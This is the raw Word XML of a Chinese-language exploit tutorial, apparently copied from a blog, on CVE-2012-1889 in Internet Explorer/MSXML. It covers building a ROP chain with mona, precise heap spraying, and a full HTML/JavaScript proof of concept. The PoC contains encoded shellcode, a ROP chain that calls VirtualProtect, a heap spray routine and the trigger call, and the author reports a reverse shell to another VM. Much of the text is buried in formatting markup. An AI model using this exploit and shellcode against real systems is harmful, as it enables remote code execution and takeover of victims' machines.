            <wp:docPr id="24" name="图片 24" descr="1569155203413[2]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69155203413[2]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32" w:name="_Toc9702"/>
      <w:bookmarkStart w:id="33" w:name="_Toc31009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4.4 构建 Rop (原创)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
      <w:bookmarkEnd w:id="33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720" w:right="720" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>看到网上有些精华帖，直接断言 使用0x0c0c0c0c填充栈会失败,得用0x0c0c0c08然后配合后面一个call 之间的关系，才能完成Rop Bypass；但是我的头铁，实践探索了一下，其实就使用0x0c0c0c0c 就能成功Rop Bypass.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其实我们需要构建两个rop链：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将执行流切换到栈上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/>
        <w:ind w:left="316" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/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修改栈的保护属性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1.构建执行流切换Rop(这里使用得模块是VsaVb7rt.dll，这个模块是系统模块，且没有ReBase，没有ALSR)：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2619375"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="31" name="图片 25" descr="1569156097045[2]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1569156097045[2]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4" w:right="0" w:hanging="360"/>
        <w:jc w:val="left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316" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19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000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>使用mona 构建栈保护属性修改Rop：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4" w:right="0" w:hanging="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:shd w:val="clear" w:fill="DADADA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="630" w:afterAutospacing="0" w:line="359" w:lineRule="atLeast"/>
        <w:ind w:left="736" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="1F0909"/>
          <w:spacing w:val="0"/>
          <w:shd w:val="clear" w:fill="DADADA"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="116644"/>
          <w:spacing w:val="0"/>
          <w:shd w:val="clear" w:fill="DADADA"/>
        </w:rPr>
        <w:t>0x5e329d12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EBP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0x5e329d12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skip 4 bytes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0x5e28f7a4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EBX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0x00000201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0x00000201-&gt; ebx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0x5e292c9d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EBX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0x00000040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0x00000040-&gt; edx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0x5e34b61c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XOR EDX,EDX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0x5e34b5ee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ADD EDX,EBX // POP EBX // RETN 0x10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0x41414141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Filler (compensate)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0x5e26098b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ECX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0x41414141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Filler (RETN offset compensation)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0x41414141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Filler (RETN offset compensation)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0x41414141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Filler (RETN offset compensation)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0x41414141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Filler (RETN offset compensation)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0x5e357284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&amp;Writable location [VsaVb7rt.dll] -------- 这里是用来保存的OldProtect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0x5e25e6cc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EDI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0x5e267102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RETN (ROP NOP)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0x5e25b1f6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ESI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0x5e23aa93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JMP [EAX]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0x5e290c74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POP EAX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0x74614224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ptr to &amp;VirtualProtect() (skipped module criteria, check if pointer is reliable !) [IAT MSVCR80.dll]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0x5e351384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PUSHAD // RETN [VsaVb7rt.dll]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="1F0909"/>
          <w:spacing w:val="0"/>
          <w:shd w:val="clear" w:fill="DADADA"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="1F0909"/>
          <w:spacing w:val="0"/>
          <w:shd w:val="clear" w:fill="DADADA"/>
        </w:rPr>
        <w:t>      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="116644"/>
          <w:spacing w:val="0"/>
          <w:shd w:val="clear" w:fill="DADADA"/>
        </w:rPr>
        <w:t>0x5e287050</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="1F0909"/>
          <w:spacing w:val="0"/>
          <w:shd w:val="clear" w:fill="DADADA"/>
        </w:rPr>
        <w:t>,  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="AA5500"/>
          <w:spacing w:val="0"/>
          <w:shd w:val="clear" w:fill="DADADA"/>
        </w:rPr>
        <w:t>// ptr to 'jmp esp' [VsaVb7rt.dll]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79" w:beforeAutospacing="0" w:after="158" w:afterAutospacing="0" w:line="17" w:lineRule="atLeast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</w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc25854"/>
      <w:bookmarkStart w:id="35" w:name="_Toc19315"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="1F0909"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>4.5 实现精准堆喷</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
      <w:bookmarkEnd w:id="35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&gt; !heap -p -a 0c0c0c0c // 查看0c0c0c0c所在堆的信息，以计算到此堆块初始未知的偏移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u w:val="single"/>
          <w:bdr w:val="single" w:color="auto" w:sz="12" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5467350" cy="847725"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="25" name="图片 26" descr="1569160613343[1]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1569160613343[1]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计算偏移：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((Userptr - 0c0c0c0c )%0x1000 - 4 )/2 == 0x5f4;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  <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>所以在把rop放在0x5f4的偏移位置，然后把shellcode 放在rop之后就能实现精准堆喷了。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1F0909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05" w:beforeAutospacing="0" w:after="225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</w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc6717"/>
      <w:bookmarkStart w:id="37" w:name="_Toc14335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4.6 构建poc 实现反弹shell</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
      <w:bookmarkEnd w:id="37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shellcode 和极光的一样，就不再赘述了。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直接构建poc如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:shd w:val="clear" w:fill="DADADA"/>
        <w:spacing w:before="210" w:beforeAutospacing="0" w:after="645" w:afterAutospacing="0" w:line="369" w:lineRule="atLeast"/>
        <w:ind w:left="42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&lt;html&gt;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&lt;head&gt;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&lt;title&gt;CVE 2012-1889 PoC&lt;/title&gt;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&lt;/head&gt;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&lt;body&gt;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&lt;object classid="clsid:A138CF39-2CAE-42c2-ADB3-022658D79F2F"&gt;&lt;/object&gt;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&lt;object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id='poc'&gt;&lt;/object&gt;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&lt;script&gt;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debugger;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var shellcode =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unescape("%u8b55%u53ec%u5756%u8160%u00ec%u0002%ueb00%u6320%u646d%u652e%u6578%u7700%u3273%u335f%u2e32%u6c64%u006c%u656b%u6e72%u6c65%u3233%u642e%u6c6c%ue800%u0000%u0000%u895b%ue05d%u8b64%u3035%u0000%u8b00%u0c76%u768b%u8b1c%u8b36%u0876%ud68b%ub860%ub065%u0f81%u5250%u73e8%u0001%u8900%ufc45%uc085%u840f%u01ff%u0000%u8b61%ufc7d%u438d%u6aee%u6a00%u5000%ud7ff%u4589%u8df4%ue343%u006a%u006a%uff50%u89d7%uf045%uec81%u0300%u0000%ud468%u0168%u8b7b%uf045%ue850%u0136%u0000%u348d%u5624%u0268%u0002%uff00%u85d0%u0fc0%uba85%u0001%u6800%uf064%u5bbc%u458b%u50f0%u15e8%u0001%u6a00%u6a00%u6a00%u6a00%u6a06%u6a01%uff02%u89d0%uec45%u2068%ubb4e%u8bc9%uf045%ue850%u00f6%u0000%uc766%u2484%u0100%u0000%u0002%uc766%u2484%u0102%u0000%ueb05%u84c7%u0424%u0001%u0000%u0000%u8d00%u24b4%u0100%u0000%u146a%uff56%uec75%ud0ff%uc085%u850f%u0157%u0000%u3e68%u97a7%u8b18%uf045%ue850%u00b2%u0000%uff68%uffff%uff7f%uec75%ud0ff%uc085%u850f%u0137%u0000%u3d68%u032e%uff62%uf075%u93e8%u0000%u6a00%u6a00%uff00%uec75%ud0ff%u4589%u68e8%u4d79%u92d7%u75ff%ue8f4%u007a%u0000%ud08b%ubc8d%u7024%u0002%ub900%u0011%u0000%u00b8%u0000%ufc00%uabf3%u84c7%u7024%u0002%u4400%u0000%uc700%u2484%u029c%u0000%u0101%u0000%uc766%u2484%u02a0%u0000%u0000%u758b%u89e8%u24b4%u02a8%u0000%ub489%uac24%u0002%u8900%u24b4%u02b0%u0000%ub48d%u7024%u0002%u8d00%u24bc%u0100%u0000%u5d8b%u8de0%udb5b%u5657%u006a%u006a%u006a%u016a%u006a%u006a%u6a53%uff00%ue9d2%u0097%u0000%u8b55%u83ec%u20ec%u758b%u8b08%u3c4e%uf103%u768b%u0378%u0875%u7589%u8bfc%u205e%u5d03%u8b08%u1846%u7c48%u8b35%u8334%u7503%u6008%ue856%u0038%u0000%u7d8b%u3b0c%u61c7%ue875%u758b%u8bfc%u2476%u7503%u3308%u66c9%u0c8b%u8b46%ufc75%u768b%u031c%u0875%u048b%u038e%u0845%u02eb%uc033%u558b%u8b08%u0c5d%ue58b%uc25d%u0008%u9090%u8b55%u83ec%u10ec%u00b8%u0000%u8b00%u0875%uc933%u0e8a%uc103%uc88b%ue9c1%uc107%u19e0%uc10b%u3346%u8ac9%u840e%u75c9%u8be7%u5de5%u04c2%u9000%u6890%ua312%uc69f%u75ff%ue8f4%uff5c%uffff%u006a%ud0ff%ue58b"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//rop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var rop_chain =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"\u0c20\u0c0c"+"\u29ed\u5e32"+"\u29ed\u5e32"+"\u29ed\u5e32"+"\u29ed\u5e32"+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"\u29ed\u5e32"+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"\u29ed\u5e32"+"\u29f1\u5e32"+"\u29f1\u5e32"+"\u29f1\u5e32"+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"\u29f0\u5e32"+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"\uf190\u5e28"+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"\u9d12\u5e32" + // 0x5e329d12 : ,# POP EBP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"\u9d12\u5e32" + // 0x5e329d12 : ,# skip 4 bytes [VsaVb7rt.dll]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"\uf7a4\u5e28" + // 0x5e28f7a4 : ,# POP EBX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"\u0201\u0000" + // 0x00000201 : ,# 0x00000201-&gt; ebx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"\u2c9d\u5e29" + // 0x5e292c9d : ,# POP EBX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"\u0040\u0000" + // 0x00000040 : ,# 0x00000040-&gt; edx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"\ub61c\u5e34" + // 0x5e34b61c : ,# XOR EDX,EDX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"\ub5ee\u5e34" + // 0x5e34b5ee : ,# ADD EDX,EBX # POP EBX # RETN 0x10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"\u1000\u0000" + // 0x41414141 : ,# Filler (compensate)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"\u098b\u5e26" + // 0x5e26098b : ,# POP ECX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"\u4141\u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)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"\u4141\u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)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"\u4141\u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)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"\u4141\u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)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"\u7284\u5e35" + // 0x5e357285 : ,# &amp;Writable location [VsaVb7rt.dll]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"\ue6cc\u5e25" + // 0x5e25e6cc : ,# POP EDI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"\u7102\u5e26" + // 0x5e267102 : ,# RETN (ROP NOP) [VsaVb7rt.dll]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"\ub1f6\u5e25" + // 0x5e25b1f6 : ,# POP ESI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"\uaa93\u5e23" + // 0x5e23aa93 : ,# JMP [EAX] [VsaVb7rt.dll]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"\u0c74\u5e29" + // 0x5e290c74 : ,# POP EAX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"\u4224\u7461" + // 0x74614224 : ,# ptr to &amp;VirtualProtect() (skipped module criteria, check if pointer is reliable !) [IAT MSVCR80.dll]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"\u1384\u5e35" + // 0x5e351384 : ,# PUSHAD # RETN [VsaVb7rt.dll]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"\u7050\u5e28" ; // 0x5e287050 : ,# ptr to 'jmp esp' [VsaVb7rt.dll]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function spray_heap()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{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var chunk_size, nopsled, evilcode, block;  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chunk_size = 0x100000;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nopsled = "\u0c0c\u0c0c";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var leftLength = 0x1000-0x5f4-rop_chain.length-shellcode.length;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while (nopsled.length &lt; 0x1000)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    nopsled += nopsled;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padding1 = nopsled.substring(0, 0x5f4);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padding2 = nopsled.substring(0, leftLength);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evilcode = padding1 + rop_chain + shellcode+padding2;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//console.log("evilcode.length:" + evilcode.length);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while (evilcode.length &lt; chunk_size){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evilcode += evilcode;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 }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block = evilcode.substring(0, chunk_size);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heap_chunks = new Array();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for (var i = 0 ; i &lt; 200 ; i++)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    heap_chunks[i] = block.substring(0, block.length);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}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spray_heap();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//Vulnerability Trigger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var pocObj = document.getElementById('poc').object;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//初始化数据变量srcImgPath的内容(unescape()是解码函数)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var srcImgPath = unescape('\u0c0c\u0c0c');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//构建一个长度为0x1000字节的数据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while(srcImgPath.length &lt; 0x1000)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    srcImgPath += srcImgPath;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//构建一个长度为0x1000*4的数据,起始内容为“\\poc”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srcImgPath = "\\\\poc"+srcImgPath;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nLenth = 0x1000-4-2-1;  //4=堆长度信息 2=堆结尾信息 1=0x00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srcImgPath = srcImgPath.substr(0,nLenth);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//创建一个图片元素,并将图片源路径设为srcImgPath;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var emtPic = document.createElement("img");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emtPic.src = srcImgPath;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emtPic.nameProp;    //返回当前图片文件名(载入路径)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   pocObj.definition(0);  //定义对象（触发溢出）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 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&lt;/script&gt;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&lt;/body&gt;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&lt;/html&gt;</w:t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br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="DADADA"/>
        </w:rPr>
        <w:t>​</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:pBdr>
          <w:top w:val="none" w:color="C5C5C5" w:sz="0" w:space="0"/>
          <w:left w:val="none" w:color="C5C5C5" w:sz="0" w:space="0"/>
          <w:bottom w:val="single" w:color="C5C5C5" w:sz="6" w:space="18"/>
          <w:right w:val="none" w:color="C5C5C5" w:sz="0" w:space="0"/>
        </w:pBdr>
        <w:shd w:val="clear" w:fill="FFFFFF"/>
        <w:spacing w:before="885" w:beforeAutospacing="0" w:after="210" w:afterAutospacing="0" w:line="584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bookmarkStart w:id="38" w:name="_Toc1472"/>
      <w:bookmarkStart w:id="39" w:name="_Toc1667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5"/>
          <w:szCs w:val="45"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>5 查看exp结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
      <w:bookmarkEnd w:id="39"/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A7A53"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="14335125" cy="6648450"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="26" name="图片 27" descr="1569162987953[5]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1569162987953[5]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351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36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在另外一个虚拟机成功连接上目标虚拟机，exp成功。</w:t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(漏洞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BB6E0F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FBBB6E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4AB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3F5B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4A4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33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2E89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5B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13F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092E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89B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D4F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586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07EC8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0C58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ED5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4C"/>
    <w:rsid w:val="00427FB2"/>
    <w:rsid w:val="004312E5"/>
    <w:rsid w:val="004316B2"/>
    <w:rsid w:val="0043191E"/>
    <w:rsid w:val="00431BAD"/>
    <w:rsid w:val="00431FFC"/>
    <w:rsid w:val="004325E8"/>
    <w:rsid w:val="0043287B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1D1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CC3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15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44D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4FD2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08B6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32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7D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027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3B6D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2A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6F798B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9D3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A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04C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79B"/>
    <w:rsid w:val="007B5BC0"/>
    <w:rsid w:val="007B60FC"/>
    <w:rsid w:val="007B61C8"/>
    <w:rsid w:val="007B6DE9"/>
    <w:rsid w:val="007B769B"/>
    <w:rsid w:val="007B7815"/>
    <w:rsid w:val="007C09C8"/>
    <w:rsid w:val="007C0FF4"/>
    <w:rsid w:val="007C157D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A7A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179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4E4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D8D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49EB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3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679B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1A9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7AD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27CE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1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1CE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357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630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9D2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C49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2E56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BD6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1E2"/>
    <w:rsid w:val="00C602DD"/>
    <w:rsid w:val="00C60A37"/>
    <w:rsid w:val="00C60C69"/>
    <w:rsid w:val="00C60FA3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906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931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0371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506"/>
    <w:rsid w:val="00CC5F92"/>
    <w:rsid w:val="00CC64FB"/>
    <w:rsid w:val="00CC6DE6"/>
    <w:rsid w:val="00CC76FB"/>
    <w:rsid w:val="00CC779D"/>
    <w:rsid w:val="00CC791E"/>
    <w:rsid w:val="00CC7A07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720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4DC6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44E1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6FF"/>
    <w:rsid w:val="00D83825"/>
    <w:rsid w:val="00D83A94"/>
    <w:rsid w:val="00D83E42"/>
    <w:rsid w:val="00D84AB4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0EC3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6B64"/>
    <w:rsid w:val="00DB6BB1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4E0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6059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066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0B8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5B2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3DD9"/>
    <w:rsid w:val="00EC4390"/>
    <w:rsid w:val="00EC446C"/>
    <w:rsid w:val="00EC4BC7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C2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2B8D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A94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4D"/>
    <w:rsid w:val="00F90266"/>
    <w:rsid w:val="00F90CC9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1CF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BD1"/>
    <w:rsid w:val="00FF6F29"/>
    <w:rsid w:val="00FF716B"/>
    <w:rsid w:val="00FF7534"/>
    <w:rsid w:val="00FF7EE5"/>
    <w:rsid w:val="1E2115B9"/>
    <w:rsid w:val="22C47CBB"/>
    <w:rsid w:val="26815AC0"/>
    <w:rsid w:val="35763615"/>
    <w:rsid w:val="371F171F"/>
    <w:rsid w:val="596110F0"/>
    <w:rsid w:val="611E58D9"/>
    <w:rsid w:val="616B65AD"/>
    <w:rsid w:val="7C01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61">
    <w:name w:val="Unresolved Mention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6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29.png"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022093500494-2062262552.png" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022094102849-865796523.png" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022094101938-699358615.png" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022094101009-506326425.png" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022094059989-1483917445.png" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022094059056-1619167909.png" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022094057695-65670855.png" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022094055800-796003727.png" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022094054891-145130009.png" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022094054206-710099932.png" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022094053416-1545907723.png" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022094052529-1161847931.png" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022094051793-1996132291.png" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022094050945-1148033991.png" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022094050172-1017758079.png" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022094049394-182403469.png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s://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022094048756-266015054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2.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022094048152-1211601180.png" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022094047207-1464769262.png" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022094046288-397558485.png" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022093445851-1487438833.png" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022093444617-1755857148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hyperlink" Target="https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022093443686-1625813427.png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img2018.cnblogs.com/blog/1748935/201910/1748935-20191022093442887-2023881239.png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img2018.cnblogs.com/blog/1748935/201910/1748935-20191022093442216-874892378.png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img2018.cnblogs.com/blog/1748935/201910/1748935-20191022093441650-269676055.png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img2018.cnblogs.com/blog/1748935/201910/1748935-20191022093440679-1570059703.png" TargetMode="Externa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A9653D-233B-4455-A288-D19FE9E47E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3</Pages>
  <Words>142</Words>
  <Characters>814</Characters>
  <Lines>6</Lines>
  <Paragraphs>1</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>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Jack Zhang</cp:lastModifiedBy>
  <cp:lastPrinted>2017-03-18T09:51:00Z</cp:lastPrinted>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-01-20T05:32:56Z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